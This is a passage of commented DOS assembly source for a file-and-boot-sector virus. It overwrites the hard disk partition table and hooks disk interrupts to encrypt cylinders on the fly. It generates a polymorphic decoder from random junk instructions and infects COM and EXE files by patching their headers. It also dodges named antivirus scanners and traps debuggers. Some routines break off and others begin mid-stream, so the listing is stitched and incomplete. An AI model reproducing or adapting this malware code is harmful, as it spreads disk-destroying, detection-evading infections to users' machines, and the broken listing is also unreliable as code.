;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz callz int_13h
int_13h proc near
pushf
cli
db 9Ah ; call far ptr int_13h_addr
int_13h_addr dw 774h, 70h
retn
int_13h endp
pop si
pop dx
pop cx
loc_09C0:
jmp loc_0855 ; jmp 2 mem_install
loc_09C3:
mov cx, [bx+2] ; gimme boot_start
mov dh, [bx+1] ; gimme head
call sub_0D2F ; convert_it
add si, 7 ; make valid cyl_number
mov [lowest_cyl - p][di], si ; store it
xchg si, ax
mov cx, [bx+6] ; gimme end cylinder
mov dh, [bx+1] ; gimme head
call sub_0D2F ; convert_it
mov [max_cyl_number - p][di], si; store it
mov [mov_ax_? - p][di], si ; store it
add ax, si
shr ax, 1 ; div with 2
mov [one_half_cyl - p][di], ax; store one_half
pop si
pop dx
pop cx
mov ax, 307h
xchg bx, si
inc cx
mov [viruz_start_sec - p][bx], cx
call int_13h ; write viruz_ body
jc loc_09C0 ; (whole)
lea si, [boot_start - p][bx]; and now move boot
lea di, [buffer - p][bx]
push di
mov cx, offset the_second_part - offset boot_start
rep movsb
db 0b8h ; mov ax, ?
mov_ax_? dw 265h ; store starting_sector_
stosw ; _2_ crypt
mov ax, 301h ; write the new parition_table
pop bx
mov cx, 1
call int_13h
jc loc_09C0 ; error ?
loc_0A1D:
pop bx ; nope
loc_0A1E:
push cs ; dis is a renewal of parts
pop ds ; that were overwritten
push cs ; by decode routine
pop es
db 8Dh,0B7h ; lea si, cs:[overwritt...][bx]
dw offset overwritten_bytez - p
db 81h,0C3h ;add bx, offset decode_...
dw offset decode_routine_table - p
mov cx, 0Ah ; there'z 0ah_partz
locloop_0A2D:
mov di, [bx] ; gimme where_2_move_offset
push cx
mov cx, 0Ah ; every_part haz 0ah bytez
rep movsb
pop cx
inc bx ; go2 next_move_offset
inc bx
loop locloop_0A2D ; and go on
pop es
db 83h,0C3h ; add bx, 0 - (....)
db 0 - (offset beginning_ofs - offset exe_header)
mov di, es ; bx 2 exe_header_offset
add di, 10h ; count start_seg
add [bx+16h], di ; store relo_cs
add [bx+0Eh], di ; store relo_ss
cmp word ptr [bx+6], 0 ; what'bout relo_cnt ?
je short loc_0AB6 ; there'z any ?
mov ds, es:[2ch] ; yope; gimme environment_seg
xor si, si ; start at offset 00h
loc_0A56:
inc si
cmp word ptr [si], 0 ; eof formal_environment ?
jne loc_0A56
add si, 4 ; go2 prog_name
xchg dx, si
mov ax, 3D00h ; open prog_file
int 21h
jc short loc_0ADB ; error ?
push cs
pop ds
mov ds:[handle_ - p - 10h][bx], ax ; store handle_
mov dx, [bx+18h] ; gimme tabl_offset
mov ax, 4200h ; f_ptr 2 it
call sub_0817
push es ; store start_seg
xchg di, ax
loc_0A79:
push ax
lea dx, cs:[reloc_buffer - p - 10h][bx]
mov cx, [bx+6] ; gimme relo_cnt
cmp cx, (name_buffer + 34 - random_number) shr 2
jb short loc_0A8A ; 2 big ?
mov cx, (name_buffer + 34 - random_number) shr 2
; yope gimme max_relo_cnt_now
loc_0A8A:
sub [bx+6], cx ; sub it from relo_cnt
push cx
shl cx, 1 ; mul it with 4
shl cx, 1 ; (segment:offset)
mov ah, 3Fh ; read reloc_table
call sub_0817
jc short loc_0ADB ; error ?
pop cx
pop ax
xchg si, dx
locloop_0A9D:
add [si+2], ax ; make relo_seg
les di, dword ptr [si] ; gimme relo_addr
add es:[di], ax ; and add start_seg
add si, 4 ; go2 next entry
loop locloop_0A9D
; in : dx = max_number
; out : dx = random_number
random_number:
mov cs:[mov_si_? - p], si
push ax
push bx
push cx
push dx
db 0b9h ; mov cx, ?
mov_cx_? dw 0b0d4h
db 0bbh ; mov bx, ?
mov_bx_? dw 6210h
mov dx, 15Ah
mov ax, 4E35h
xchg si, ax
xchg dx, ax
test ax, ax
jz short loc_0AFC
mul bx
loc_0AFC:
jcxz short loc_0B03
xchg cx, ax
mul si
add ax, cx
loc_0B03:
xchg si, ax
mul bx
add dx, si
inc ax
adc dx, 0
mov cs:[mov_bx_? - p], ax
mov cs:[mov_cx_? - p], dx
mov ax, dx
pop cx
xor dx, dx
jcxz short loc_0B1E
div cx
loc_0B1E:
pop cx
pop bx
pop ax
pop si
push si
cmp byte ptr cs:[si], 0CCh ; there'z a breakpoint ?
loc_0B27:
je loc_0B27 ; if yope stay in loop
; (nice_try ...)
db 0beh ; mov si, ?
mov_si_? dw 5cbh
retn
sub_08D4 endp
;
unimportant_instr:
;
nop
stc
clc
sti
db 2Eh ; cs:
db 36h ; ss:
db 3Eh ; ds:
cld
std
cmc
;
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz movez unimportant_instr 2 buffer
; in : dx = wieviel :-)
sub_0B57 proc near
or dx, dx ; count is null ?
jz short loc_ret_0B71
push si
push cx ; push regz
push dx
mov cx, dx ; count 2 cx
locloop_0B60:
mov si, offset unimportant_instr - p
mov dx, 0Ah ; max_random 2 0ah (10 instr)
call random_number ; gimme random_number
add si, dx ; go2 instruction
movsb ; move it
loop locloop_0B60 ; and go on
pop dx
pop cx ; restore regz
pop si
loc_ret_0B71:
retn ; and end ...
sub_0B57 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz putz be4 and after instruction unimportant_instructionz
; in : dx = wieviel u_instr
sub_0B72 proc near
mov ax, dx ; instr_count 2 ax
inc dx
call random_number ; gimme random_number
sub ax, dx ; sub cur_instr_count from
; instr_count
call sub_0B57 ; move unimportant_instr
xchg dx, ax
rep movsb ; move real_instruction
db 81h,0FBh ; cmp bx, offset jnz_offset - p
dw offset jnz_offset - p ; it'z last_one ? (jnz xor_...)
jnz short loc_0B92
mov ax, ds:[xor_offset - p] ; gimme xor_offset
sub ax, di ; sub cur_instr_buffer_index
add ax, offset instr_buffer - p; add instr_buffer_back
sub ax, [bx] ; sub jnz_offset
dec di ; go2 disp8
stosb ; and store it
loc_0B92:
call sub_0B57 ; and now put some u_instr
; after real_instruction
retn ; and end ...
sub_0B72 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; This sets rite ModR/M instructions ....
; There are two phases here:
; 1. : m_?_i - a_?_i = sets instruction that worx with xor_reg
; 2. : m_i_? - c_i_? = sets instruction that worx with index_reg
; in : dl = random_number that depends on phase
; Just go through it and try to know what's happening here :)
sub_0BA4 proc near
loc_0BA4:
lodsw
xchg di, ax
mov al, dl
cmp si, offset i_?_i - p
jne short loc_0BB6
and al, 5
cmp al, 1
jne short loc_0BC6
mov al, 7
loc_0BB6:
cmp si, offset a_?_i - p
jne short loc_0BC6
mov cl, 3
shl al, cl
or [di], al
or al, 0C7h
jmp short loc_0BCA
loc_0BC6:
or [di], al
or al, 0F8h
loc_0BCA:
and [di], al
cmp si, offset m_i_? - p
je short loc_ret_0BDA
cmp si, offset sub_0BA4 - p
je short loc_ret_0BDA
jmp short loc_0BA4
loc_ret_0BDA:
retn
sub_0BA4 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz preparez decode_routine ...
sub_0BDB proc near
mov dx, 2
call random_number ; gimme random_number
mov byte ptr ds:[push_what - p], 0Eh; store push_cs
or dx, dx ; random_number nullovy ?
jz short loc_0BEF
mov byte ptr ds:[push_what - p], 16h; nope so store
; push_ss
loc_0BEF:
mov si, offset m_?_i - p ; start with first_phaze
loc_0BF2:
mov dx, 8
call random_number ; gimme random_number
cmp dl, 4 ; we don't need sp_reg
je loc_0BF2
mov bl, dl ; reg 2 bl
call sub_0BA4 ; set instructionz etc.
mov si, offset m_i_? - p ; start with second_phaze
loc_0C05:
mov dx, 3
call random_number ; gimme random_number
add dl, 6
cmp dl, 8
jne short loc_0C15
mov dl, 3 ; yope set bx_reg
loc_0C15:
cmp dl, bl ; xor_reg = index_reg ?
je loc_0C05
call sub_0BA4 ; nope so set instr. etc.
xor cx, cx
mov di, offset decode_routine_table - p
loc_0C21:
cmp cx, 9 ; jnz_instruction ?
jne short loc_0C40
loc_0C26: ; yope
; it'z jnz disp8
; so it must be in the range
; 0 - 80h bytez
mov dx, 0C8h
call random_number ; gimme random_number
sub dx, 64h ; sub 0c8h / 2
add dx, ds:[xor_offset - p] ; add xor_offset
cmp dx, 0 ; less than 0 ?
jl loc_0C26
cmp dx, ds:[max_number - p] ; more or same than max_number?
jge loc_0C26
jmp short loc_0C46
loc_0C40:
db 0bah ; mov dx, ?
max_number dw 466h ; random_max iz max_number
call random_number ; gimme random_number
loc_0C46:
jcxz short loc_0C5F ; first timez here ?
mov si, offset decode_routine_table - p
push cx ; nope
locloop_0C4C: ; so go2 cur_instr and check
; 4 distancez
lodsw
sub ax, dx ; check 4 distance
cmp ax, 0Ah ; more or same than 0ah bytez ?
jge loc_0C5C
cmp ax, 0FFF6h ; less or same than 0ah bytez ?
jle loc_0C5C
pop cx ; nope ! get another random_#
jmp loc_0C21
loc_0C5C: ; yope
loop locloop_0C4C ; so go2 next insrt
pop cx ; last_one
loc_0C5F:
xchg dx, ax ; random_number 2 ax
stosw ; store it 2 decode_...
inc cx ; inc counter
cmp cx, 0Ah ; less than 0ah (10 piecez) ?
jb loc_0C21
; nope = decode_routine_table
; initialized ...
mov bx, offset decode_routine_table - p
mov si, offset instr_start - p
loc_0C6D:
mov di, offset instr_buffer - p
lodsb ; read instr_length
mov cl, al ; instr_length 2 cx
mov dx, 8 ; u_instr 2 dx
sub dx, cx ; sub it
mov ax, [bx+2] ; gimme next_d_entry_offset
; if jnz_instr next iz
; viruz_beginning ...
sub ax, [bx] ; sub from it cur_d_entry
cmp ax, 0Ah ; distance 0ah ?
jne short loc_0C8B
inc dx ; inc u_instr (we don't need
inc dx ; jmp_instr ...)
call sub_0B72
inc bx ; go2 next decode_routine_
inc bx ; _offset
jmp short loc_0CB5 ; and go on
loc_0C8B: ; nope
call random_number ; gimme random_number
call sub_0B72 ; copy instruction 2 buffer ...
mov dx, di ; gimme instr_buffer_offset
sub dx, offset three_bytez - p; sub ofs instr_buffer - 3
add dx, [bx] ; add cur_d_entry
mov al, 0E9h ; far_jmp 2 al
stosb ; store it
inc bx ; go2 next_entry
inc bx
mov ax, [bx] ; gimme it
sub ax, dx ; sub it
cmp ax, 7Eh ; distance more than 7eh ?
jg short loc_0CB4
cmp ax, 0FF7Fh ; distance less than 0ff7fh ?
jl short loc_0CB4
inc ax ; nope inc distance (jmp_short
; only 2 bytez ...)
mov byte ptr [di-1], 0EBh ; store rather jmp_short
stosb ; store disp8
jmp short loc_0CB5 ; and go on
loc_0CB4: ; yope
stosw ; store disp16
loc_0CB5:
push bx
push cx
db 0b9h ; mov cx, 0
mov_cx_?_ dw 0 ; gimme file_pointer
db 0bah ; mov dx, 13h
mov_dx_?_ dw 13h
add dx, [bx-2] ; add decode_table_entry
adc cx, 0 ; (the current)
push cx
push dx
call sub_0E63 ; go2 f_ptr
mov cx, 0Ah ; read 0ah bytez
db 0bah ; mov dx, ?
buffer_offset dw 0a4h ; 2 [buffer_offset]
add ds:[buffer_offset - p], cx; go2 next_buffer_offset_entry
call f_read_
pop dx
pop cx
jc short loc_0CE6 ; error ?
call sub_0E63 ; go back 2 f_ptr
xchg cx, di ; cur_instr_buffer_offset 2 cx
mov dx, offset instr_buffer - p; sub offset instr_buffer
sub cx, dx ; sub it 2 get instr_size
call f_write_ ; and write it ...
loc_0CE6:
pop cx
pop bx
jc short loc_ret_0CF3 ; error ?
db 81h,0FBh ; cmp bx, offset beginning_ofs - p
dw offset beginning_ofs - p
jnc short loc_ret_0CF3 ; last decode_routine_entry ?
jmp loc_0C6D ; nope so go on ...
loc_ret_0CF3: ; yope
retn ; so end ...
sub_0BDB endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz cryptz_ viruz_body
sub_0D12 proc near
push cx
mov si, dx ; gimme viruz_start_offset
db 0b8h ; mov ax, 0
crypt_viruz dw 0 ; gimme init_crypt_vale
mov cx, offset buffer - p ; gimme viruz_size
locloop_0D1B:
xor [si], ax ; crypt_it
db 05h ; add ax, ?
next_crypt_value dw 0 ; go2 next_crypt_value
inc si ; go2 next viruz_byte
loop locloop_0D1B ; and go on
pop cx
retn ; and end ...
sub_0D12 endp
new_int_24h:
mov al, 3
iret
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz callz old_int_13h
sub_0D28 proc near
pushf
call dword ptr cs:[old_int_13h - p__]
retn
sub_0D28 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz getz cylinder_number in si
sub_0D2F proc near
push cx
push dx
shr cl, 1
shr cl, 1
and dh, 0C0h
or dh, cl
mov cl, 4
shr dh, cl
mov dl, ch
xchg si, dx
pop dx
pop cx
retn
sub_0D2F endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz cryptz_ a buffer
crypt_ proc near
push ax
push bx ; push regz
push cx
db 0b0h ; mov al, ?
secz_count db 0 ; gimme secz_count
db 0bbh ; mov bx, ?
buf_ptr dw 0 ; gimme buf_ptr
loc_0D4D:
mov cx, 100h ; do it 256*
; (in wordz)
locloop_0D50:
db 26h, 81h, 37h ; xor word ptr es:[bx], ?
crypt_value dw 2b50h ; xor word ...
inc bx ; go2 next_word in buffer
inc bx
loop locloop_0D50 ; and go on
new_int_13h:
cmp ah, 2 ; read sector(z) ?
je short loc_0D6E
cmp ah, 3 ; write sector(z) ?
je short loc_0D6E
jmp loc_0E50 ; nope so end
loc_0D6E:
cmp dx, 80h ; 0.head, first_harddisk ?
jne short loc_0DE0
test cx, 0FFC0h ; cylinder is null ?
jnz short loc_0DE0
push bx ; ok it could be work with
push dx ; partition_table or with
push si ; viruz_body
push di
push cx
push cx
mov si, ax ; gimme ax_reg
and si, 0FFh ; gimme secz_2_work
mov di, si
mov al, 1
push ax
jz short loc_0DBB ; secz_2_work is null ?
jcxz short loc_0DDB ; sec_number is null ?
cmp cl, 1 ; work with parition_table ?
je short loc_0DCD
loc_0D94: ; nope so it could be viruz
db 80h, 0f9h ; body
max_sektor db 11h ; cmp cl, ?
ja short loc_0DDB ; are we in the range
db 80h, 0f9h ; cmp cl, ?
partition_sec_n db 0ah ; where'z viruz_body ?
jb short loc_0DD2
cmp ah, 3 ; yope = writing ?
je short loc_0DDB ; (end_with error)
push bx
mov cx, 200h ; do it 512*
locloop_0DA7:
mov byte ptr es:[bx], 0 ; store null
inc bx ; inc buffer_ptr
loop locloop_0DA7 ; and go on ...
pop bx
loc_0DAF:
add bx, 200h ; go2 next_sec_in_buffer
pop ax
pop cx
inc cx ; inc sec_number
push cx
push ax
dec si ; dec secz_2_work
jnz loc_0D94 ; null ?
loc_0DBB:
clc
loc_0DBC: ; yope
pop ax ; restore ax_reg
pushf
xchg di, ax ; secz_2_work 2 ax
sub ax, si ; sub secz_that_weren't_read
popf
mov ah, ch ; error number 2 ah
pop cx
pop cx
pop di ; restore regz
pop si
pop dx
pop bx
retf 2 ; and end ...
loc_0DCD:
mov cl, byte ptr cs:[partition_sec_n - p__] ; yope
; so gimme parition_table_sec
loc_0DD2:
call sub_0D28 ; write or read it
mov ch, ah ; gimme possible_error_number
jc loc_0DBC ; error ?
jmp short loc_0DAF ; nope = go on
loc_0DDB: ; yope
stc ; so set up error_flag
mov ch, 0BBh ; and error_number 2 ch
jmp short loc_0DBC ; (undefined_error)
loc_0DE0: ; nope
cmp dl, 80h ; it'z first_harddisk ?
jne short loc_0E50
push ax
push cx
push dx
push si ; push regz
push ds
push cs
pop ds
mov byte ptr ds:[secz_count - p__], 0 ; store null
mov word ptr ds:[buf_ptr - p__], bx ; store bx
call sub_0D2F ; gimme cylinder_number
and cl, 3Fh ; voklesti sector
and dh, 3Fh ; voklesti head
loc_0DFE:
or al, al ; secz_2_work is null ?
jz short loc_0E31
db 81h, 0feh ; cmp si, ?
max_cyl_number dw 265h ; are we in the range
jae short loc_0E31 ; where'z harddisk
db 81h, 0feh ; cmp si, ?
cur_cyl_number dw 1234h ; crypted_ ?
jb short loc_0E14
inc byte ptr ds:[secz_count - p__] ; yope inc secz_count
jmp short loc_0E1A
loc_0E14:
add word ptr ds:[buf_ptr - p__], 200h; go2 next_sec_in_buf
loc_0E1A:
dec al ; dec secz_2_work
inc cl
db 80h, 0f9h ; cmp cl, ?
max_sektor_2 db 11h ; sector in range ?
jbe loc_0DFE
mov cl, 1 ; nope so sector 2 1
inc dh ; and inc head
db 80h, 0feh ; cmp dh, ?
max_heads db 07h ; head in range ?
jbe loc_0DFE
xor dh, dh ; nope so head 2 null
inc si ; and inc cylinder
jmp short loc_0DFE ; and go on
loc_0E31: ; yope
cmp byte ptr ds:[secz_count - p__], 0; must we (un)crypt_
pop ds ; something ?
pop si ; restore regz
pop dx
pop cx
pop ax
jz short loc_0E50
cmp ah, 2 ; yope; read ?
je short loc_0E45
call crypt_ ; nope write; crypt_ it
loc_0E45:
call sub_0D28 ; do it
pushf
call crypt_ ; and uncrypt_ it
popf
retf 2
loc_0E50: ; end ...
db 0EAh ; jmp far ptr old_int_13h
old_int_13h label near
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz writez 2 file ...
f_write_ proc near
mov ah, 40h
jmp $ + 4
f_write_ endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz readz from file ...
f_read_ proc near
mov ah, 3Fh ; '?'
call sub_0E6F
jc short loc_ret_0E5E
cmp ax, cx
loc_ret_0E5E:
retn
f_read_ endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz call f_ptr fc
sub_0E5F proc near
xor cx, cx
mov dx, cx
sub_0E63:
mov ax, 4200h
jmp short loc_0E6F
sub_0E68:
xor cx, cx
mov dx, cx
sub_0E6C:
mov ax, 4202h
sub_0E6F:
loc_0E6F:
mov bx, word ptr cs:[handle - p]
locloop_0FA2:
add [si], dx ; add base
inc si ; go2 next_entry
inc si
loop locloop_0FA2 ; and go on ...
pop bx
cmp byte ptr ds:[exe_flag - p], 0 ; com_file ?
jne short loc_0FD0
mov byte ptr [bx], 0E9h ; store far_jump
mov ax, ds:[decode_routine_table - p]; gimme jump_offset
sub ax, 103h ; sub 103h (100h PSP and 03h
; far_jmp)
mov [bx+1], ax ; store it
mov word ptr ds:[relo_cnt - p], 0; store relo_cnt
mov word ptr ds:[relo_cs - p], 0FFF0h; store relo_cs
mov word ptr ds:[exe_ip - p], 100h; store exe_ip
jmp short loc_0FF7 ; and go on
loc_0FD0: ; nope exe_file
mov [bx+16h], ax ; store relo_cs
mov [bx+0Eh], ax ; store relo_ss
mov ax, ds:[decode_routine_table - p]; gimme starting_ofs
mov [bx+14h], ax ; store exe_ip
add [bx+10h], dx ; add it 2 exe_sp
mov word ptr [bx+6], 0 ; null relo_cnt
mov ax, 28h ; my_min_mem 2 ax
cmp [bx+0Ah], ax ; compare it with min_mem
jae short loc_0FEF ; more ?
mov [bx+0Ah], ax ; yope so store my_min_mem
loc_0FEF:
cmp [bx+0Ch], ax ; compare it with max_mem
jae short loc_0FF7 ; more ?
mov [bx+0Ch], ax ; yope so store my_max_mem
loc_0FF7:
push bx
call sub_0E68 ; go2 eof
db 0e8h ; call presun_rutiny (
; viruz_body_crypt_&_write)
dw offset presun_rutiny - presun_rutiny + buffer - next___
next___ label near ; crypt_ it and write it
loc_0FFE:
jc short loc_1031
call sub_0E68 ; go2 eof
div word ptr ds:[page_size_ - p] ; div new_file_size
inc ax ; 2 count pagez
pop bx
cmp byte ptr ds:[exe_flag - p], 0 ; exe_file ?
je short loc_1016
mov [bx+4], ax ; store new page_cnt
mov [bx+2], dx ; store new part_pag
loc_1016:
push bx
call sub_0E5F ; go2 sof
mov cx, 1Ah
pop dx
call f_write_ ; write new_exe_header 2 file
jc short loc_1031 ; error ?
mov ax, 5701h ; set back file_time_date
mov cx, ds:[file_time_date - p] ; gimme time_stamp
mov dx, ds:[file_time_date - p + 2] ; gimme date_stamp
call sub_0E6F ; set it
loc_1031:
mov sp, bp
retn ; and end ...
sub_0E7C endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz setz my own error_handler
sub_1034 proc near
push dx
push ds
push cs
pop ds
mov ax, 3524h ; gimme old_int_24h
call int_21h
mov ds:[old_int_24h - p + 2], es ; store it
mov ds:[old_int_24h - p], bx
mov ax, 2524h ; and set my own
mov dx, offset new_int_24h - p__ ; handler
call int_21h
pop ds
pop dx
retn ; and end ...
sub_1034 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz setz back old_int_24h
sub_1052 proc near
mov ax, 2524h
lds dx, dword ptr cs:[old_int_24h - p]; gimme old_int_24h
call int_21h ; set it back
retn ; and end ...
sub_1052 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz checkz the file_name and drive ...
sub_1098 proc near
push dx
push bx
push cx
push si
push di ; push regz
push ds
push es
push ax
mov si, dx ; gimme file_name_offset
mov di, name_buffer - p ; gimme buffer where 2 store
push cs
pop es
lea bx, [di-1]
mov cx, 4Bh ; try it 4bh*
locloop_10AD:
lodsb ; read byte
cmp al, 61h ; 'a'
jb short loc_10B8 ; low_case ?
cmp al, 7Ah ; 'z'
ja short loc_10B8
sub al, 20h ; yope so make high_case
loc_10B8:
push ax
push si
loc_10BA: ; nope
cmp al, 20h ; space ?
jne short loc_10C7
lodsb ; read byte
or al, al ; null ?
jnz loc_10BA
pop si ; yope
pop si
jmp short loc_10D7 ; end ...
loc_10C7:
pop si
pop ax
cmp al, 5Ch ; '\'
je short loc_10D5
cmp al, 2Fh ; '/'
je short loc_10D5
cmp al, 3Ah ; ':'
jne short loc_10D7
loc_10D5:
mov bx, di ; store offset 2 bx
loc_10D7:
stosb ; store byte
or al, al ; null ?
jz short loc_10DE
loop locloop_10AD ; and go on
loc_10DE: ; yope
mov si, offset _com_ - p ; check 4 .COM or .EXE
sub di, 5 ; sub 5 (.XXX, 0)
push cs
pop ds
call sub_1149 ; it'z .COM ?
jz short loc_10F0
call sub_1149 ; it'z .EXE ?
jnz short loc_113C
loc_10F0: ; yope
pop ax
push ax
xchg di, bx ; gimme file_name_offset
inc di ; inc it (/, \, or : ...)
cmp ax, 4B00h ; fc run file ?
jne short loc_1107
mov si, offset _chkdsk_ - p
call sub_1149 ; do we run CHKDISK ?
jnz short loc_1107
mov byte ptr ds:[fcb_jmp_ - p], offset loc_121a - (fcb_jmp_ + 1)
; yope so turn off fcb_sub_viruz_size
loc_1107:
mov cx, 7 ; check 4 7 antivirusez
mov si, offset _scan_ - p ; start with SCAN
locloop_110D:
push cx
call sub_1149 ; compare name
pop cx
jz short loc_113C ; it'z antiviruz ?
loop locloop_110D ; nope go on
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz comparez 2 stringz
sub_1149 proc near
push di
lodsb ; gimme bytez_count
mov cl, al ; store it 2 cx
mov ax, si ; gimme si
add ax, cx ; add bytez_count 2 offset
repe cmpsb ; compare
mov si, ax ; store new_offset
pop di
retn ; and end ...
sub_1149 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
